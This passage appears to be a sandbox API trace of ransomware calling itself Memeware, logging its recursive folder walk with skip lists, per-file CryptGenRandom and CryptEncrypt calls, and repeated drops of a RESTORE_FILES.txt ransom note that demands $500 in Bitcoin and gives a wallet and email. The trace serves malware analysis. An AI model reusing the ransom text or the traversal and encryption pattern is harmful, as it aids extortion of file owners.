(hObject=0xd8) returned 1 [0090.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Windows") returned -1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Program Files") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Program Files (x86)") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="$Recycle.bin") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="System Volume Information") returned -1 [0090.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned 66 [0090.373] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0090.373] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0090.373] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned 68 [0090.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.374] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.374] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\.") returned 68 [0090.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.374] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\..") returned 69 [0090.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.374] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\RESTORE_FILES.txt") returned 84 [0090.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\speech\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.375] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.375] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.375] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.375] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.375] CloseHandle (hObject=0xd8) returned 1 [0090.375] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Windows") returned -1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="Program Files (x86)") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="$Recycle.bin") returned 1 [0090.376] lstrcmpiW (lpString1="SystemCertificates", lpString2="System Volume Information") returned 1 [0090.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 78 [0090.376] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0090.376] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0090.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned 80 [0090.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.376] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.376] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.") returned 80 [0090.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.376] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.376] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.376] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\..") returned 81 [0090.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.377] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.377] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.377] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1="My", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1="My", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 81 [0090.377] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0090.377] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0090.377] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned 83 [0090.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.377] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.377] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.377] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.") returned 83 [0090.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.377] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.377] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.378] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.378] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.378] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.378] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\..") returned 84 [0090.378] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.378] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.378] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.378] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.378] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Windows") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Program Files") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="Program Files (x86)") returned -1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="$Recycle.bin") returned 1 [0090.378] lstrcmpiW (lpString1="Certificates", lpString2="System Volume Information") returned -1 [0090.378] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 94 [0090.378] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0090.378] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned 96 [0090.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.379] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.379] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.379] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.") returned 96 [0090.379] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.379] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.379] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.379] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.379] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.379] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\..") returned 97 [0090.379] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.379] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.379] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.379] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.380] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.380] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.380] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt") returned 112 [0090.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.380] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.380] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.381] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.381] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.381] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.381] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.381] CloseHandle (hObject=0x150) returned 1 [0090.381] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.381] lstrcmpiW (lpString1="CRLs", lpString2="Windows") returned -1 [0090.381] lstrcmpiW (lpString1="CRLs", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="Program Files (x86)") returned -1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="$Recycle.bin") returned 1 [0090.382] lstrcmpiW (lpString1="CRLs", lpString2="System Volume Information") returned -1 [0090.382] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 86 [0090.382] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0090.382] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0090.382] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned 88 [0090.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.382] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.382] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.382] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.382] 